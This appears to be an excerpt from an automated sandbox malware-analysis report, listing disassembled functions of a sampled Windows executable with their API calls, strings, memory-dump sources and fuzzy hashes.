                                                                                                                                                                                                                                                    • Instruction ID: 23eed9ef8498fd5f0606f74dd798d8c3fb185be74bf08dbe012904205ce83e7b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B41A666F1968282EA709B11B5002BA7394FF54BC4F4A4179DF5D9B789DF3CE811C780
                                                                                                                                                                                                                                                    Function 00007FF69F3FA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF69F3F43FD,?,?,?,?,00007FF69F3F979A,?,?,?,?,00007FF69F3F649F), ref: 00007FF69F3FA5E7
                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF69F3F43FD,?,?,?,?,00007FF69F3F979A,?,?,?,?,00007FF69F3F649F), ref: 00007FF69F3FA61D
                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF69F3F43FD,?,?,?,?,00007FF69F3F979A,?,?,?,?,00007FF69F3F649F), ref: 00007FF69F3FA64A
                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF69F3F43FD,?,?,?,?,00007FF69F3F979A,?,?,?,?,00007FF69F3F649F), ref: 00007FF69F3FA65B
                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF69F3F43FD,?,?,?,?,00007FF69F3F979A,?,?,?,?,00007FF69F3F649F), ref: 00007FF69F3FA66C
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF69F3F43FD,?,?,?,?,00007FF69F3F979A,?,?,?,?,00007FF69F3F649F), ref: 00007FF69F3FA687
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                                    • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                                                                                                                                    • Instruction ID: ec8827ee7d790c6b40eecc494e74d5d3fa586c2b27b4af7da20a9851c46b61d3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF115924B1D24242FEB8A72196491793392DF58BB0F0647B8E83ECE6D6DE2CF4416781
                                                                                                                                                                                                                                                    Function 00007FF69F3E2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                    • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                    • Opcode ID: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                                                                                                                                                                                                                    • Instruction ID: 7925f66676d3d9c0058a642b2309aada346b5baadb34954b90fc9837ce625ee0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52316F72A09A8289EB30DF61E8552F97360FF88B84F450179EA4D8BB5ADF7CD504C744
                                                                                                                                                                                                                                                    Function 00007FF69F3E2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                                    • API String ID: 1878133881-640379615
                                                                                                                                                                                                                                                    • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                                                    • Instruction ID: cb146d1c1da6cc0f687448d3f3ea7496dd6be8939145ea894c6a77581c0f3bb1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB21947262868692E730DB10F4517EA7364FF94B84F41017AEB8C87699CF7CD645C780
                                                                                                                                                                                                                                                    Function 00007FF69F3F8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                                    • Instruction ID: d285201614e87f070be4bd2a518840d50029765efa69a3b4abe6466ab347ceac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF0AF21B08B0681FB248B24E4483396320EF69BA4F5906B9D96ECA2F0CF3CD149D344
                                                                                                                                                                                                                                                    Function 00007FF69F408678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                    • Instruction ID: a20c8f5354a777b24bb0bd014b52b62bc8ae0736200fe5a05a82cba680d59ff6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A111D022E59A0241F7741168DA553381340EF74B74F6F0AB0F92EC77DB8EACA8A08742
                                                                                                                                                                                                                                                    Function 00007FF69F3FA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF69F3F98B3,?,?,00000000,00007FF69F3F9B4E,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3FA6BF
                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF69F3F98B3,?,?,00000000,00007FF69F3F9B4E,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3FA6DE
                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF69F3F98B3,?,?,00000000,00007FF69F3F9B4E,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3FA706
                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF69F3F98B3,?,?,00000000,00007FF69F3F9B4E,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3FA717
                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF69F3F98B3,?,?,00000000,00007FF69F3F9B4E,?,?,?,?,?,00007FF69F3F9ADA), ref: 00007FF69F3FA728
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                                    • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                                                                                                                                    • Instruction ID: bfb9f2eabc7cd307a1e7846b93a8de5e46adec77bc489168f18676a7bb08c31d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E116D20B1C24242FEF8576595459793391DF987B0E0643B9E83E8E6D6DE2CF841A781
                                                                                                                                                                                                                                                    Function 00007FF69F3FA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                                    • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                                                                                                                                    • Instruction ID: bdb908acb67ede65ab9980293457f43d62befa677f48b891e6f9a48fa9469cda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA111820A2D20742FEF8632548551B92381CF5A770F0647BCD97ECE2D2ED2CB4417781
                                                                                                                                                                                                                                                    Function 00007FF69F3F52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: verbose
                                                                                                                                                                                                                                                    • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                    • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                                                    • Instruction ID: df6ea5053e891a9d6fd5b581b4e36689430b8724982d9089d5911ccca9d1899a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F91D332A09A4682F7F18E25D45037D3791EB40B94F8A417ADA5ECBBD5DF3CE845A380
                                                                                                                                                                                                                                                    Function 00007FF69F3FEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                    • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                                    • Instruction ID: 3aebbf2a9cdfcac8052b256fab40332685cd8c442a62e49800d3cb6c7884324e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A818D72E2824385FBF44E39C11027827A0EB11B48F5782B9DE0ADF295DF2DE945A781
                                                                                                                                                                                                                                                    Function 00007FF69F3EC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                    • Instruction ID: 9a8c45389386feb189a6168ac7a1e17b6e295f7264f6b61a3e81c7629a06b0fb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED519E32B196528BDB24CA25E404A7D7791FF44BC8F128178EE4A8B785EE7CEC41C780
                                                                                                                                                                                                                                                    Function 00007FF69F3EE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                    • Instruction ID: d14b3bce3e861d3257973eb4c56c3446014beb82fbca6b1607ed39cbb043a587
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD516C32A0824287EB748B21D44427C77A1EF55B94F164179DA9D8BBD5CF3CECA0CB81
                                                                                                                                                                                                                                                    Function 00007FF69F3EE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                                                    • Instruction ID: 5ef8e2b61cda651d7d88bbabf555437dbba67934f62f7a4ecfdb2f8d73a62af6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7961A232908BC582DB319F25E4403BAB7A0FB94784F054269EB9C4BB99CF7CE594CB40
                                                                                                                                                                                                                                                    Function 00007FF69F3E7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,?,00007FF69F3E324C,?,?,00007FF69F3E3964), ref: 00007FF69F3E7642
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
